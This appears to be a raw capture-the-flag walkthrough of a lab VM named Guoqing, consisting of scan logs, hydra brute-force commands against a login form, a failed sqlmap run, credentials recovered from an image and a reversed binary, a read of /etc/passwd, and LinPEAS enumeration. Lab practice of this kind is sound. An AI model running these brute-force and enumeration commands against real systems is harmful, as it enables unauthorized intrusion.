1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# rustscan -a 192.168.0.101 -- -A
3
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
4
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
5
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
6
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
7
The Modern Day Port Scanner.
8
________________________________________
9
: http://discord.skerritt.blog         :
10
: https://github.com/RustScan/RustScan :
11
 --------------------------------------
12
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan
13

14
[~] The config file is expected to be at "/root/.rustscan.toml"
15
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
16
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
17
Open 192.168.0.101:22
18
Open 192.168.0.101:80
19
[~] Starting Script(s)
20
[>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.0.101
21
Depending on the complexity of the script, results may take some time to appear.
22
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-17 05:27 EST
23
NSE: Loaded 156 scripts for scanning.
24
NSE: Script Pre-scanning.
25
NSE: Starting runlevel 1 (of 3) scan.
26
Initiating NSE at 05:27
27
Completed NSE at 05:27, 0.00s elapsed
28
NSE: Starting runlevel 2 (of 3) scan.
29
Initiating NSE at 05:27
30
Completed NSE at 05:27, 0.00s elapsed
31
NSE: Starting runlevel 3 (of 3) scan.
32
Initiating NSE at 05:27
33
Completed NSE at 05:27, 0.00s elapsed
34
Initiating ARP Ping Scan at 05:27
35
Scanning 192.168.0.101 [1 port]
36
Completed ARP Ping Scan at 05:27, 0.05s elapsed (1 total hosts)
37
Initiating Parallel DNS resolution of 1 host. at 05:27
38
Completed Parallel DNS resolution of 1 host. at 05:27, 0.03s elapsed
39
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
40
Initiating SYN Stealth Scan at 05:27
41
Scanning 192.168.0.101 [2 ports]
42
Discovered open port 22/tcp on 192.168.0.101
43
Discovered open port 80/tcp on 192.168.0.101
44
Completed SYN Stealth Scan at 05:27, 0.02s elapsed (2 total ports)
45
Initiating Service scan at 05:27
46
Scanning 2 services on 192.168.0.101
47
Completed Service scan at 05:27, 6.03s elapsed (2 services on 1 host)
48
Initiating OS detection (try #1) against 192.168.0.101
49
NSE: Script scanning 192.168.0.101.
50
NSE: Starting runlevel 1 (of 3) scan.
51
Initiating NSE at 05:27
52
Completed NSE at 05:27, 0.36s elapsed
53
NSE: Starting runlevel 2 (of 3) scan.
54
Initiating NSE at 05:27
55
Completed NSE at 05:27, 0.01s elapsed
56
NSE: Starting runlevel 3 (of 3) scan.
57
Initiating NSE at 05:27
58
Completed NSE at 05:27, 0.00s elapsed
59
Nmap scan report for 192.168.0.101
60
Host is up, received arp-response (0.00041s latency).
61
Scanned at 2026-01-17 05:27:40 EST for 8s
62

63
PORT   STATE SERVICE REASON         VERSION
64
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
65
| ssh-hostkey:
66
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
67
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDRmicDuAIhDTuUUa37WCIEK2z2F1aDUtiJpok20zMzkbe1B41ZvvydX3JHjf7mgl0F/HRQlGHiA23Il+dwr0YbbBa2ggd5gDl95RSHhuUff/DIC10OFbP3YU8A4ItFb8pR6dN8jr+zU1SZvfx6FWApSkTJmeLPq9PN889+ibvckJcOMqrm1Y05FW2VCWn8QRvwivnuW7iU51IVz7arFe8JShXOLu0ANNqZEXyJyWjaK+MqyOK6ZtoWdyinEQFua81+tBZuvS+qb+AG15/h5hBsS/tUgVk5SieY6cCRvkYFHB099e1ggrigfnN4Kq2GvzRUYkegjkPzJFQ7BhPyxT/kDKrlVcLX54sXrp0poU5R9SqSnnESXVM4HQfjIIjTrJFufc2nBF+4f8dH3qtQ+jJkcPEKNVSKKEDULEk1BSBdokhh1GidxQY7ok+hEb9/wPmo6RBeb1d5t11SP8R5UHyI/yucRpS2M8hpBaovJv8pX1VwpOz3tUDJWCpkB3K8HDk=
68
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
69
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI2Hl4ZEYgnoDQflo03hI6346mXex6OPxHEjxDufHbkQZVosDPFwZttA8gloBLYLtvDVo9LZZwtv7F/EIiQoIHE=
70
|   256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
71
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILRLvZKpSJkETalR4sqzJOh8a4ivZ8wGt1HfdV3OMNY1
72
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
73
|_http-title: \xE9\x9D\x9E\xE4\xB8\xBB\xE6\xB5\x81\xE7\x82\xAB\xE9\x85\xB7\xE7\xA9\xBA\xE9\x97\xB4 | \xE6\xAC\xA2\xE8\xBF\x8E\xE5\x85\x89\xE4\xB8\xB4
74
| http-methods:
75
|_  Supported Methods: HEAD GET POST OPTIONS
76
|_http-server-header: Apache/2.4.62 (Debian)
77
MAC Address: 08:00:27:85:7C:03 (Oracle VirtualBox virtual NIC)
78
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
79
Device type: general purpose
80
Running: Linux 4.X|5.X
81
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
82
OS details: Linux 4.15 - 5.8
83
TCP/IP fingerprint:
84
OS:SCAN(V=7.94SVN%E=4%D=1/17%OT=22%CT=%CU=39195%PV=Y%DS=1%DC=D%G=N%M=080027
85
OS:%TM=696B6424%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10C%TI=Z%CI=Z%II
86
OS:=I%TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7
87
OS:%O5=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%
88
OS:W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S
89
OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R
90
OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=
91
OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
92
OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
93
OS:I=N%T=40%CD=S)
94

95
Uptime guess: 7.338 days (since Fri Jan  9 21:21:48 2026)
96
Network Distance: 1 hop
97
TCP Sequence Prediction: Difficulty=257 (Good luck!)
98
IP ID Sequence Generation: All zeros
99
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
100

101
TRACEROUTE
102
HOP RTT     ADDRESS
103
1   0.41 ms 192.168.0.101
104

105
NSE: Script Post-scanning.
106
NSE: Starting runlevel 1 (of 3) scan.
107
Initiating NSE at 05:27
108
Completed NSE at 05:27, 0.00s elapsed
109
NSE: Starting runlevel 2 (of 3) scan.
110
Initiating NSE at 05:27
111
Completed NSE at 05:27, 0.00s elapsed
112
NSE: Starting runlevel 3 (of 3) scan.
113
Initiating NSE at 05:27
114
Completed NSE at 05:27, 0.00s elapsed
115
Read data files from: /usr/share/nmap
116
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
117
Nmap done: 1 IP address (1 host up) scanned in 8.26 seconds
118
           Raw packets sent: 25 (1.894KB) | Rcvd: 17 (1.366KB)

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# gobuster dir -u 192.168.0.101 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64
3
===============================================================
4
Gobuster v3.6
5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
6
===============================================================
7
[+] Url:                     http://192.168.0.101
8
[+] Method:                  GET
9
[+] Threads:                 64
10
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
11
[+] Negative Status codes:   404
12
[+] User Agent:              gobuster/3.6
13
[+] Extensions:              yaml,php,txt,html,zip,db,bak,js
14
[+] Timeout:                 10s
15
===============================================================
16
Starting gobuster in directory enumeration mode
17
===============================================================
18
/.html                (Status: 403) [Size: 278]
19
/.php                 (Status: 403) [Size: 278]
20
/index.html           (Status: 200) [Size: 9042]
21
/login.php            (Status: 200) [Size: 2771]
22
/logout.php           (Status: 302) [Size: 0] [--> login.php]
23
/dashboard.php        (Status: 302) [Size: 0] [--> login.php]

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# dirsearch -u http://192.168.0.101
3
/root/.pyenv/versions/3.11.9/envs/web/lib/python3.11/site-packages/dirsearch/dirsearch.py:23: UserWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html. The pkg_resources package is slated for removal as early as 2025-11-30. Refrain from using this package or pin to Setuptools<81.
4
  from pkg_resources import DistributionNotFound, VersionConflict
5

6
  _|. _ _  _  _  _ _|_    v0.4.3.post1
7
 (_||| _) (/_(_|| (_| )
8

9
Extensions: php, aspx, jsp, html, js | HTTP method: GET
10
Threads: 25 | Wordlist size: 11460
11

12
Output File: /home/kali/reports/http_192.168.0.101/_26-01-17_05-28-59.txt
13

14
Target: http://192.168.0.101/
15

16
[05:28:59] Starting:
17
[05:29:00] 403 -  278B  - /.ht_wsr.txt
18
[05:29:00] 403 -  278B  - /.htaccess.bak1
19
[05:29:00] 403 -  278B  - /.htaccess.orig
20
[05:29:00] 403 -  278B  - /.htaccess.save
21
[05:29:00] 403 -  278B  - /.htaccess_extra
22
[05:29:00] 403 -  278B  - /.htaccess.sample
23
[05:29:00] 403 -  278B  - /.htaccess_orig
24
[05:29:00] 403 -  278B  - /.htaccess_sc
25
[05:29:00] 403 -  278B  - /.htaccessOLD2
26
[05:29:00] 403 -  278B  - /.htaccessOLD
27
[05:29:00] 403 -  278B  - /.htaccessBAK
28
[05:29:00] 403 -  278B  - /.htm
29
[05:29:00] 403 -  278B  - /.html
30
[05:29:00] 403 -  278B  - /.htpasswd_test
31
[05:29:00] 403 -  278B  - /.htpasswds
32
[05:29:00] 403 -  278B  - /.httr-oauth
33
[05:29:01] 403 -  278B  - /.php
34
[05:29:15] 302 -    0B  - /dashboard.php  ->  login.php
35
[05:29:25] 200 -  937B  - /login.php
36
[05:29:26] 302 -    0B  - /logout.php  ->  login.php
37
[05:29:42] 403 -  278B  - /server-status
38
[05:29:42] 403 -  278B  - /server-status/
39

40
Task Completed

1
POST /login.php HTTP/1.1
2

3
Host: 192.168.0.101
4

5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
6

7
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
8

9
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
10

11
Accept-Encoding: gzip, deflate, br
12

13
Content-Type: application/x-www-form-urlencoded
14

15
Content-Length: 29
16

17
Origin: http://192.168.0.101
18

19
Connection: keep-alive
20

21
Referer: http://192.168.0.101/login.php
22

23
Cookie: PHPSESSID=g7hip4qlponncgkf301noj3mdp
24

25
Upgrade-Insecure-Requests: 1
26

27
Priority: u=0, i
28

29
username=admin&password=admin

1
HTTP/1.1 200 OK
2

3
Date: Sat, 17 Jan 2026 10:33:01 GMT
4
Server: Apache/2.4.62 (Debian)
5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
6
Cache-Control: no-store, no-cache, must-revalidate
7
Pragma: no-cache
8
Vary: Accept-Encoding
9
Content-Length: 2841
10
Keep-Alive: timeout=5, max=100
11
Connection: Keep-Alive
12
Content-Type: text/html; charset=UTF-8
13

14

15

16
<!DOCTYPE html>
17
<html lang="zh-CN">
18
<head>
19
    <meta charset="UTF-8">
20
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
21
    <title>登录系统</title>
22

23
</head>
24
<body>
25
    <div class="login-container">
26
        <h2>系统登录</h2>
27

28
                    <div class="error">用户名或密码错误</div>
29

30
        <form method="POST" action="login.php">
31
            <div class="form-group">
32
                <label for="username">用户名</label>
33
                <input type="text" id="username" name="username" required autofocus>
34
            </div>
35

36
            <div class="form-group">
37
                <label for="password">密码</label>
38
                <input type="password" id="password" name="password" required>
39
            </div>
40

41
            <button type="submit" class="btn">登录</button>
42
        </form>
43
    </div>
44
</body>
45
</html>

1
┌──(web)─(root㉿kali)-[/home/kali]
2
└─# hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 192.168.0.101 http-post-form "/login.php:username=^USER^&password=^PASS^:用户名或密码错误"

1
hydra -l todd -P /usr/share/wordlists/rockyou.txt -f 192.168.0.101 http-post-form "/login.php:username=^USER^&password=^PASS^:用户名或密码错误"

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# sqlmap -r post --batch
3
        ___
4
       __H__
5
 ___ ___[']_____ ___ ___  {1.10.1.47#dev}
6
|_ -| . ["]     | .'| . |
7
|___|_  [,]_|_|_|__,|  _|
8
      |_|V...       |_|   https://sqlmap.org
9

10
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
11

12
[*] starting @ 05:38:26 /2026-01-17/
13

14
[05:38:26] [INFO] parsing HTTP request from 'post'
15
[05:38:26] [INFO] testing connection to the target URL
16
[05:38:27] [INFO] checking if the target is protected by some kind of WAF/IPS
17
[05:38:27] [INFO] testing if the target URL content is stable
18
[05:38:28] [INFO] target URL content is stable
19
[05:38:28] [INFO] testing if POST parameter 'username' is dynamic
20
[05:38:28] [WARNING] POST parameter 'username' does not appear to be dynamic
21
[05:38:28] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
22
[05:38:28] [INFO] testing for SQL injection on POST parameter 'username'
23
[05:38:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
24
[05:38:28] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
25
[05:38:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
26
[05:38:28] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
27
[05:38:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
28
[05:38:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
29
[05:38:28] [INFO] testing 'Generic inline queries'
30
[05:38:28] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
31
[05:38:28] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
32
[05:38:28] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
33
[05:38:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
34
[05:38:28] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
35
[05:38:28] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
36
[05:38:28] [INFO] testing 'Oracle AND time-based blind'
37
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n] Y
38
[05:38:28] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
39
[05:38:28] [WARNING] POST parameter 'username' does not seem to be injectable
40
[05:38:28] [INFO] testing if POST parameter 'password' is dynamic
41
[05:38:29] [WARNING] POST parameter 'password' does not appear to be dynamic
42
[05:38:29] [WARNING] heuristic (basic) test shows that POST parameter 'password' might not be injectable
43
[05:38:29] [INFO] testing for SQL injection on POST parameter 'password'
44
[05:38:29] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
45
[05:38:31] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
46
[05:38:31] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
47
[05:38:32] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
48
[05:38:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
49
[05:38:34] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
50
[05:38:35] [INFO] testing 'Generic inline queries'
51
[05:38:36] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
52
[05:38:36] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
53
[05:38:37] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
54
[05:38:38] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
55
[05:38:40] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
56
[05:38:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
57
[05:38:42] [INFO] testing 'Oracle AND time-based blind'
58
[05:38:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
59
[05:38:46] [WARNING] POST parameter 'password' does not seem to be injectable
60
[05:38:46] [CRITICAL] all tested parameters do not appear to be injectable. Try to increase values for '--level'/'--risk' options if you wish to perform more tests. If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could try to use option '--tamper' (e.g. '--tamper=space2comment') and/or switch '--random-agent'
61

62
[*] ending @ 05:38:46 /2026-01-17/

1
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
2
└─# binwalk todd.png
3

4
                                          /home/kali/Desktop/hmv/todd.png
5
-------------------------------------------------------------------------------------------------------------------
6
DECIMAL                            HEXADECIMAL                        DESCRIPTION
7
-------------------------------------------------------------------------------------------------------------------
8
0                                  0x0                                PNG image, total size: 12928 bytes
9
-------------------------------------------------------------------------------------------------------------------
10

11
Analyzed 1 file for 85 file signatures (187 magic patterns) in 2.0 milliseconds
12

13

14
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
15
└─# strings todd.png
16

17
....
18
/T1i
19
5iMZ
20
IEND
21
todd:toddishandsome

1
<!DOCTYPE html>
2
<html lang="zh-CN">
3
<head>
4
    <meta charset="UTF-8">
5
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
6
    <title>仪表盘</title>
7
</head>
8
<body>
9
    <div class="header">
10
        <h1>系统仪表盘</h1>
11
    </div>
12

13
    <div class="container">
14
        <div class="welcome">
15
            欢迎, admin!
16
        </div>
17

18
        <div class="card">
19
            <h3>系统信息</h3>
20
            <p>您已成功登录系统。这是一个简单的仪表盘页面，用于演示目的。</p>
21
        </div>
22
       <!--
23
        <div class="card">
24
            <a href="hyh" class="hyhforever" target="_blank"></a>
25
        </div>
26
        -->
27
        <div class="card">
28
            <h3>账户操作</h3>
29
            <a href="logout.php" class="btn">退出登录</a>
30
        </div>
31
    </div>
32
</body>
33
</html>

1
<!--
2
<div class="card">
3
    <a href="hyh" class="hyhforever" target="_blank"></a>
4
</div>
5
-->

1
hyh@Guoqing:~$ cat /etc/passwd
2
root:x:0:0:root:/root:/bin/bash
3
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
4
bin:x:2:2:bin:/bin:/usr/sbin/nologin
5
sys:x:3:3:sys:/dev:/usr/sbin/nologin
6
sync:x:4:65534:sync:/bin:/bin/sync
7
games:x:5:60:games:/usr/games:/usr/sbin/nologin
8
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
9
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
10
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
11
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
12
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
13
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
14
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
15
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
16
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
17
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
18
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
19
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
20
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
21
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
22
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
23
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
24
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
25
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
26
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
27
segfault:x:1000:1000:,,,:/home/segfault:/bin/bash
28
hyh:x:1001:1001:,,,:/home/hyh:/bin/bash
29
todd:x:1002:1002:,,,:/home/todd:/bin/bash
30
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false

1
/opt$ strings password /lib64/ld-linux-x86-64.so.2 mgUa strcpy puts stdin printf fgets strlen strcspn __ctype_b_loc __cxa_finalize strcmp __libc_start_main libc.so.6 GLIBC_2.3 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable u/UH gfffH vhjidxowH []A\A]A^A_ Please enter the password for segfault: Incorrect password length. The password should be %d characters long. Please try again: Password correct! Access granted. Incorrect password. Please try again: Too many failed attempts. Access denied. ;*3$" GCC: (Debian 10.2.1-6) 10.2.1 20210110 crtstuff.c deregister_tm_clones __do_global_dtors_aux completed.0 __do_global_dtors_aux_fini_array_entry frame_dummy __frame_dummy_init_array_entry password.c __FRAME_END__ __init_array_end _DYNAMIC __init_array_start __GNU_EH_FRAME_HDR _GLOBAL_OFFSET_TABLE_ __libc_csu_fini _ITM_deregisterTMCloneTable strcpy@GLIBC_2.2.5 puts@GLIBC_2.2.5 stdin@GLIBC_2.2.5 _edata strlen@GLIBC_2.2.5 printf@GLIBC_2.2.5 strcspn@GLIBC_2.2.5 __libc_start_main@GLIBC_2.2.5 fgets@GLIBC_2.2.5 __data_start strcmp@GLIBC_2.2.5 __gmon_start__ __dso_handle _IO_stdin_used __libc_csu_init __bss_start main caesar_encrypt __TMC_END__ _ITM_registerTMCloneTable __cxa_finalize@GLIBC_2.2.5 __ctype_b_loc@GLIBC_2.3 .symtab .strtab .shstrtab .interp .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .gnu.version .gnu.version_r .rela.dyn .rela.plt .init .plt.got .text .fini .rodata .eh_frame_hdr .eh_frame .init_array .fini_array .dynamic .got.plt .data .bss .comment

1
scp hyh@192.168.0.101:/opt/password /home/kali/Desktop/hmv/password

1
int __cdecl main(int argc, const char **argv, const char **envp)
2
{
3
  char dest[64]; // [rsp+0h] [rbp-90h] BYREF
4
  char s[64]; // [rsp+40h] [rbp-50h] BYREF
5
  char s2[12]; // [rsp+80h] [rbp-10h] BYREF
6
  int v7; // [rsp+8Ch] [rbp-4h]
7

8
  strcpy(s2, "vhjidxowqr1");
9
  v7 = 0;
10
  printf("Please enter the password for segfault: ");
11
  while ( fgets(s, 50, stdin) )
12
  {
13
    s[strcspn(s, "\n")] = 0;
14
    if ( strlen(s) == 11 )
15
    {
16
      strcpy(dest, s);
17
      caesar_encrypt(dest);
18
      if ( !strcmp(dest, s2) )
19
      {
20
        puts("Password correct! Access granted.");
21
        return 0;
22
      }
23
      printf("Incorrect password. Please try again: ");
24
      if ( ++v7 > 4 )
25
      {
26
        puts("\nToo many failed attempts. Access denied.");
27
        return 1;
28
      }
29
    }
30
    else
31
    {
32
      printf("Incorrect password length. The password should be %d characters long.\n", 11LL);
33
      printf("Please try again: ");
34
    }
35
  }
36
  return 0;
37
}

1
hyh@Guoqing:/opt$ ./password
2
Please enter the password for segfault: ykmlgarz456
3
Incorrect password. Please try again: segfaultno8
4
Password correct! Access granted.

1
hyh@Guoqing:/home/segfault$ cat name1.txt
2
sublarge
3
hyh@Guoqing:/home/segfault$ cat name2.txt
4
bamuwe
5
hyh@Guoqing:/home/segfault$ cat name3.txt
6
LingMj

1
hyh@Guoqing:~$ find / -user segfault -type f 2>/dev/null
2
/usr/local/bin/irc_bot.py
3
/home/segfault/.bash_logout
4
/home/segfault/.bashrc
5
/home/segfault/.profile
6
hyh@Guoqing:~$ cat /usr/local/bin/irc_bot.pycat: /usr/local/bin/irc_bot.py: Permission denied

1
hyh@Guoqing:~$ cat /etc/systemd/system/irc_bot.service
2
[Unit]
3
Description=IRC Bot Service
4
After=network.target
5

6
[Service]
7
User=pycrtlake
8
Group=pycrtlake
9
WorkingDirectory=/usr/local/bin
10
ExecStart=/usr/bin/python3 /usr/local/bin/irc_bot.py
11
Restart=always
12
RestartSec=5
13
StandardOutput=syslog
14
StandardError=syslog
15
Environment=PYTHONUNBUFFERED=1
16

17
[Install]
18
WantedBy=multi-user.target
19
hyh@Guoqing:~$ ls -la /etc/inspircd/
20
ls: cannot open directory '/etc/inspircd/': Permission denied
21
hyh@Guoqing:~$ cat /etc/inspircd/*.conf 2>/dev/null
22
hyh@Guoqing:~$ cat /var/log/inspircd.log
23
cat: /var/log/inspircd.log: Permission denied
24
hyh@Guoqing:~$ tail -100 /var/log/inspircd.log
25
tail: cannot open '/var/log/inspircd.log' for reading: Permission denied
26
hyh@Guoqing:~$ cat /usr/local/bin/calc-prorate
27
#!/usr/bin/python3
28
# -*- coding: utf-8 -*-
29
import re
30
import sys
31
from tempora import calculate_prorated_values
32
if __name__ == '__main__':
33
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
34
    sys.exit(calculate_prorated_values())
35
hyh@Guoqing:~$

1
1.weechat│WeeChat 3.0 (C) 2003-2020 - https://weechat.>>
2
         │07:33:49     |   __ |/ |/ / /  __/  __/ /___
3
         │             | _  / / / /_/ // /_
4
         │07:33:49     |   ____/|__/  \___/\___/\____/
5
         │             | /_/ /_/\__,_/ \__/
6
         │07:33:49     | WeeChat 3.0 [compiled on Jan 23
7
         │             | 2022 14:29:14]
8
         │07:33:49     | - - - - - - - - - - - - - - - -
9
         │             | - - - - - - - - - - - - - - - -

1
nc: command not found

1
22
2
80
3
3306 (127.0.0.1)

1
WeeChat 3.0
2
irc: unable to add temporary server

1
NICK hyh
2
!auth segfaultno8

1
-bash: command not found

1
Linux Privesc Checklist: https://book.hacktricks.wiki/en/linux-hardening/linux-privilege-escalation-checklist.html
2
 LEGEND:
3
  RED/YELLOW: 95% a PE vector
4
  RED: You should take a look to it
5
  LightCyan: Users with console
6
  Blue: Users without console & mounted devs
7
  Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
8
  LightMagenta: Your username
9

10
 Starting LinPEAS. Caching Writable Folders...
11
                               ╔═══════════════════╗
12
═══════════════════════════════╣ Basic information ╠═══════════════════════════════
13
                               ╚═══════════════════╝
14
OS: Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
15
User & Groups: uid=1001(hyh) gid=1001(hyh) groups=1001(hyh)
16
Hostname: Guoqing
17

18
[+] /usr/bin/ping is available for network discovery (LinPEAS can discover hosts, learn more with -h)
19
[+] /usr/bin/bash is available for network discovery, port scanning and port forwarding (LinPEAS can discover hosts, scan ports, and forward ports. Learn more with -h)
20

21

22
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
23

24
                              ╔════════════════════╗
25
══════════════════════════════╣ System Information ╠══════════════════════════════
26
                              ╚════════════════════╝
27
╔══════════╣ Operative system
28
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits
29
Linux version 4.19.0-27-amd64 (debian-kernel@lists.debian.org) (gcc version 8.3.0 (Debian 8.3.0-6)) #1 SMP Debian 4.19.316-1 (2024-06-25)
30
Distributor ID: Debian
31
Description:    Debian GNU/Linux 10 (buster)
32
Release:        10
33
Codename:       buster
34

35
╔══════════╣ Sudo version
36
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-version
37
Sudo version 1.9.5p2
38

39

40
╔══════════╣ PATH
41
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-path-abuses
42
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
43

44
╔══════════╣ Date & uptime
45
Sat 17 Jan 2026 07:44:53 AM EST
46
 07:44:53 up  2:17,  2 users,  load average: 0.00, 0.00, 0.00
47

48
